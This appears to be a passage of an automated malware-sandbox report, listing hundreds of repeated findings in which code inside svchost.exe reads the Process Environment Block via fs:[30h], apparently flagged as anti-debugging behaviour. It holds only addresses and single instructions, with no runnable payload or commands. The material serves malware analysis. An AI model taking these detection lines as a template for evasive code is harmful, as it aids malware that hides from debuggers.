Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]	7_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]	7_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]	7_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]	7_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]	7_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]	7_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E5CF mov eax, dword ptr fs:[00000030h]	7_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E5CF mov eax, dword ptr fs:[00000030h]	7_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034365D0 mov eax, dword ptr fs:[00000030h]	7_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034325E0 mov eax, dword ptr fs:[00000030h]	7_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C5ED mov eax, dword ptr fs:[00000030h]	7_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346C5ED mov eax, dword ptr fs:[00000030h]	7_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03432582 mov eax, dword ptr fs:[00000030h]	7_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03432582 mov ecx, dword ptr fs:[00000030h]	7_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03464588 mov eax, dword ptr fs:[00000030h]	7_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E59C mov eax, dword ptr fs:[00000030h]	7_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]	7_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]	7_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]	7_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034545B1 mov eax, dword ptr fs:[00000030h]	7_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034545B1 mov eax, dword ptr fs:[00000030h]	7_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]	7_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EA456 mov eax, dword ptr fs:[00000030h]	7_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342645D mov eax, dword ptr fs:[00000030h]	7_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345245A mov eax, dword ptr fs:[00000030h]	7_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BC460 mov ecx, dword ptr fs:[00000030h]	7_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]	7_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]	7_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]	7_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]	7_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]	7_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]	7_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]	7_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]	7_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]	7_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342C427 mov eax, dword ptr fs:[00000030h]	7_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]	7_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A430 mov eax, dword ptr fs:[00000030h]	7_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034304E5 mov ecx, dword ptr fs:[00000030h]	7_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EA49A mov eax, dword ptr fs:[00000030h]	7_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034364AB mov eax, dword ptr fs:[00000030h]	7_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034644B0 mov ecx, dword ptr fs:[00000030h]	7_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	7_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E4B4B mov eax, dword ptr fs:[00000030h]	7_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E4B4B mov eax, dword ptr fs:[00000030h]	7_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]	7_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]	7_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]	7_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]	7_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6B40 mov eax, dword ptr fs:[00000030h]	7_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6B40 mov eax, dword ptr fs:[00000030h]	7_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FAB40 mov eax, dword ptr fs:[00000030h]	7_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D8B42 mov eax, dword ptr fs:[00000030h]	7_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428B50 mov eax, dword ptr fs:[00000030h]	7_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DEB50 mov eax, dword ptr fs:[00000030h]	7_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342CB7E mov eax, dword ptr fs:[00000030h]	7_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504B00 mov eax, dword ptr fs:[00000030h]	7_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]	7_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345EB20 mov eax, dword ptr fs:[00000030h]	7_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345EB20 mov eax, dword ptr fs:[00000030h]	7_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F8B28 mov eax, dword ptr fs:[00000030h]	7_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F8B28 mov eax, dword ptr fs:[00000030h]	7_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]	7_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]	7_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]	7_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]	7_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]	7_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]	7_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	7_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]	7_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]	7_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]	7_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345EBFC mov eax, dword ptr fs:[00000030h]	7_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	7_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440BBE mov eax, dword ptr fs:[00000030h]	7_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440BBE mov eax, dword ptr fs:[00000030h]	7_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	7_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	7_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]	7_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440A5B mov eax, dword ptr fs:[00000030h]	7_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440A5B mov eax, dword ptr fs:[00000030h]	7_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]	7_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]	7_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]	7_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DEA60 mov eax, dword ptr fs:[00000030h]	7_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034ACA72 mov eax, dword ptr fs:[00000030h]	7_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034ACA72 mov eax, dword ptr fs:[00000030h]	7_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BCA11 mov eax, dword ptr fs:[00000030h]	7_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346CA24 mov eax, dword ptr fs:[00000030h]	7_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345EA2E mov eax, dword ptr fs:[00000030h]	7_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03454A35 mov eax, dword ptr fs:[00000030h]	7_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03454A35 mov eax, dword ptr fs:[00000030h]	7_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346CA38 mov eax, dword ptr fs:[00000030h]	7_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]	7_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]	7_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]	7_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430AD0 mov eax, dword ptr fs:[00000030h]	7_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03464AD0 mov eax, dword ptr fs:[00000030h]	7_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03464AD0 mov eax, dword ptr fs:[00000030h]	7_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346AAEE mov eax, dword ptr fs:[00000030h]	7_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346AAEE mov eax, dword ptr fs:[00000030h]	7_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504A80 mov eax, dword ptr fs:[00000030h]	7_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03468A90 mov edx, dword ptr fs:[00000030h]	7_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438AA0 mov eax, dword ptr fs:[00000030h]	7_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03438AA0 mov eax, dword ptr fs:[00000030h]	7_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03486AA4 mov eax, dword ptr fs:[00000030h]	7_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B0946 mov eax, dword ptr fs:[00000030h]	7_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03504940 mov eax, dword ptr fs:[00000030h]	7_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]	7_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]	7_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]	7_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0347096E mov eax, dword ptr fs:[00000030h]	7_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0347096E mov edx, dword ptr fs:[00000030h]	7_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0347096E mov eax, dword ptr fs:[00000030h]	7_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D4978 mov eax, dword ptr fs:[00000030h]	7_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D4978 mov eax, dword ptr fs:[00000030h]	7_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BC97C mov eax, dword ptr fs:[00000030h]	7_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE908 mov eax, dword ptr fs:[00000030h]	7_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AE908 mov eax, dword ptr fs:[00000030h]	7_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BC912 mov eax, dword ptr fs:[00000030h]	7_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428918 mov eax, dword ptr fs:[00000030h]	7_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03428918 mov eax, dword ptr fs:[00000030h]	7_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B892A mov eax, dword ptr fs:[00000030h]	7_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C892B mov eax, dword ptr fs:[00000030h]	7_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C69C0 mov eax, dword ptr fs:[00000030h]	7_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034649D0 mov eax, dword ptr fs:[00000030h]	7_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	7_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	7_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034629F9 mov eax, dword ptr fs:[00000030h]	7_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034629F9 mov eax, dword ptr fs:[00000030h]	7_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034309AD mov eax, dword ptr fs:[00000030h]	7_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034309AD mov eax, dword ptr fs:[00000030h]	7_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B89B3 mov esi, dword ptr fs:[00000030h]	7_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B89B3 mov eax, dword ptr fs:[00000030h]	7_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B89B3 mov eax, dword ptr fs:[00000030h]	7_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03442840 mov ecx, dword ptr fs:[00000030h]	7_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03460854 mov eax, dword ptr fs:[00000030h]	7_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434859 mov eax, dword ptr fs:[00000030h]	7_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03434859 mov eax, dword ptr fs:[00000030h]	7_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BE872 mov eax, dword ptr fs:[00000030h]	7_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BE872 mov eax, dword ptr fs:[00000030h]	7_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6870 mov eax, dword ptr fs:[00000030h]	7_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C6870 mov eax, dword ptr fs:[00000030h]	7_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BC810 mov eax, dword ptr fs:[00000030h]	7_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]	7_2_03452835
